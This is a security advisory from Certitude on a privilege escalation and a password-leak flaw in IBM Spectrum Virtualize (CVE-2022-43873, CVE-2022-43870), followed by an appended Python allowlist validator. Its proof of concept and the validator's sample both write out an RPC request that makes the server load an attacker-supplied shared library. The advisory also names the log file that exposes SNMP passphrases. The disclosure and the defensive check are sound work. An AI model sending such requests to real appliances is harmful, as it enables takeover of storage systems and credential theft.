~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~ Certitude Security Advisory - CSA-2023-001
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

PRODUCT          : Spectrum Virtualize
VENDOR           : IBM
SEVERITY         : High
AFFECTED VERSION : <8.5.3.0, <8.5.2.3, <8.5.0.7, <8.4.0.10, <8.3.1.9, <8.2.1.17
IDENTIFIERS      : CVE-2022-43870, CVE-2022-43873
PATCH VERSION    : >=8.5.3.0, >=8.5.2.3, >=8.5.0.7, >=8.4.0.10, >=8.3.1.9, >=8.2.1.17
FOUND BY         : Wolfgang Ettlinger, Certitude Lab

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Introduction
------------

IBM Spectrum Virtualize is a flexible storage appliance. During a very short
test, multiple vulnerabilities were identified in its firmware.

Vulnerability Overview
----------------------

### Privilege Escalation (CVE-2022-43873)

The administrative web interface utilizes an RPC protocol between the frontend
web application and the backend. This protocol allows the browser application
to call Java methods on the backend. However, there is no restriction on the
callable Java methods. Thus, an authenticated user can call any `public static`
Java method, e.g. one defined by the JRE or by any software library in the
classpath. As a result, many methods can be called that are not intended to be
called in this scenario. Thus, low-privileged users can access functionality
that allows code execution.

### Passwords in Log Files (CVE-2022-43870)

Log files accessible to low-privileged users may contain passwords.

Proof of Concept
----------------

### Privilege Escalation (CVE-2022-43873)

The following snippet shows a legitimate request issued by the frontend to the
backend:

```text
POST /RPCAdapter?[CSRF Token Parameter] HTTP/1.1
Host: [...]
Cookie: [...]

{
  "clazz": "com.ibm.evo.rpc.RPCRequest",
  "methodClazz": "com.ibm.svc.gui.logic.ConfigRPC",
  "methodName": "getUpdateStatus",
  "methodArgs": []
}
```

The following snippet shows that the method `java.lang.System.load(String)` can
be called with the parameter `/tmp/libtakeover.so`:

```text
POST /RPCAdapter?[CSRF Token Parameter] HTTP/1.1
Host: [...]
Cookie: [...]

{
  "clazz": "com.ibm.evo.rpc.RPCRequest",
  "methodClazz": "java.lang.System",
  "methodName": "load",
  "methodArgs": [
    "/tmp/libtakeover.so"
  ]
}
```

A low-privileged attacker could transfer a malicious shared library to
`/tmp/libtakeover.so` using SCP. After executing the request above, the
application server loads this library. An attacker can e.g. gain code
execution by declaring a function that is to be called upon loading of the
shared library (e.g. ld parameter `-init`).

### Passwords in Log Files (CVE-2022-43870)

The parameters `authpassphrase` and `privpassphrase` to the `mksnmpserver`
command are not masked in the CLI logfile `/var/log/cli_audit`. This logfile is
accessible to all system users (e.g. via SCP).

Resolution
----------

IBM has issued updates addressing both issues.
Additional information can be retrieved from the security bulletins:

- https://www.ibm.com/support/pages/node/6858047
- https://www.ibm.com/support/pages/node/6858045

References
----------

- https://certitude.consulting/advisories/CSA_2023_001_IBM_Spectrum_Virtualize_Multiple_Vulnerabilities.md.txt
- https://certitude.consulting/blog/en/privilege-escalation-in-ibm-spectrum-virtualize/

Timeline
--------

---------------------------------------------------------------------------
Date         Text
------------ --------------------------------------------------------------
2022-10-20   Uploading advisory to HackerOne
2022-10-24   IBM: team is reviewing issues
2023-02-28   IBM publishes security bulletin
2023-08-17   Public release of the advisory
---------------------------------------------------------------------------

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
(c) 2023 Certitude Consulting GmbH
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
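As an added example (not part of the advisory and not IBM's code), the kind of deny-by-default check the RPC dispatcher described under CVE-2022-43873 lacks: the client-supplied `methodClazz`/`methodName` pair is validated against an explicit allowlist before any reflective call is made. The allowlist contents and the function name are assumptions; the two sample bodies are constructed from the requests shown above.

```python
import json
import re

# Hypothetical allowlist (assumption, not IBM's real configuration): only the
# application's own RPC classes and the methods they deliberately expose.
# Anything else on the classpath (JRE, libraries) is never reachable.
RPC_ALLOWLIST = {
    "com.ibm.svc.gui.logic.ConfigRPC": {"getUpdateStatus"},
}

REQUEST_CLAZZ = "com.ibm.evo.rpc.RPCRequest"
# Dotted Java identifier: rejects paths, whitespace and other junk up front.
JAVA_IDENT = re.compile(r"^[A-Za-z_$][A-Za-z0-9_$]*(\.[A-Za-z_$][A-Za-z0-9_$]*)*$")


def validate_rpc_request(body: str) -> tuple:
    """Return (allowed, reason) for a raw RPCAdapter request body.

    Deny by default: a request is dispatched only if it is well-formed and
    names an allowlisted class *and* method; the check happens before any
    reflection, so the reason string is safe to log for detection.
    """
    try:
        req = json.loads(body)
    except json.JSONDecodeError:
        return False, "malformed JSON"
    if not isinstance(req, dict) or req.get("clazz") != REQUEST_CLAZZ:
        return False, "unexpected request envelope"
    clazz, method = req.get("methodClazz"), req.get("methodName")
    if not isinstance(clazz, str) or not JAVA_IDENT.match(clazz):
        return False, "invalid methodClazz"
    if not isinstance(method, str) or not JAVA_IDENT.match(method):
        return False, "invalid methodName"
    allowed_methods = RPC_ALLOWLIST.get(clazz)
    if allowed_methods is None:
        return False, f"class not exposed via RPC: {clazz}"
    if method not in allowed_methods:
        return False, f"method not exposed via RPC: {clazz}.{method}"
    if not isinstance(req.get("methodArgs", []), list):
        return False, "methodArgs must be a list"
    return True, "ok"


# Constructed sample bodies modelled on the two requests in the advisory.
LEGIT = ('{"clazz":"com.ibm.evo.rpc.RPCRequest","methodClazz":'
         '"com.ibm.svc.gui.logic.ConfigRPC","methodName":"getUpdateStatus","methodArgs":[]}')
ABUSE = ('{"clazz":"com.ibm.evo.rpc.RPCRequest","methodClazz":"java.lang.System",'
         '"methodName":"load","methodArgs":["/tmp/libtakeover.so"]}')

if __name__ == "__main__":
    for body in (LEGIT, ABUSE):
        print(validate_rpc_request(body))
```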